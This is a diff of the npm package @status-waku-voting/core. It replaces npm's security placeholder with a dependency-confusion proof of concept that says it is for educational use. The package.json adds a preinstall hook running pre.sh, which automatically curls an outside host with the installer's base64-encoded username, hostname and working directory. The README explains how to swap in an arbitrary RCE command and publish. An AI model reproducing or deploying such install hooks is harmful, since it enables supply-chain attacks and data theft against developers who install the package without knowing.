@status-waku-voting/core 0.0.1-security → 0.1.0

package/README.md

@@ -1,5 +1,15 @@
-# Security holding package
+# npmdc-poc
 
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
+Template repository which contains dependency confusion poc for npm package
 
-Please refer to www.npmjs.com/advisories?search=%40status-waku-voting%2Fcore for more information.
+## Usage
+
+1. Clone the repository
+2. Update `package.json` file with the vulnerable package details
+3. Update `pre.sh` without your RCE command
+4. Publish the package
+5. (Optional) `backend.php` (if you want to setup a php api which will email about the trigger)
+
+## Disclaimer
+
+This is only for educational purpose. User will be responsible for any usage of this.

package/index.js

@@ -0,0 +1 @@
+console.log('================ TAKEOVER by Codermak ================')

package/package.json

@@ -1,6 +1,15 @@
 {
   "name": "@status-waku-voting/core",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+  "version": "0.1.0",
+  "description": "",
+  "main": "index.js",
+  "scripts": {
+    "preinstall": "./pre.sh @status-waku-voting/core"
+  },
+  "repository": {
+    "type": "git",
+    "url": "git+https://github.com/codermakhackerone"
+  },
+  "author": "",
+  "license": "ISC"
 }

package/pre.sh

@@ -0,0 +1,3 @@
+#!/bin/bash
+
+curl http://kaspat.com/bugbounty/dependency-confusion-poc.php -H "Package: $1" -H "Whoami: $(whoami | base64)" -H "Hostname: $(hostname | base64)" -H "Pwd: $(pwd | base64 -w 2000)"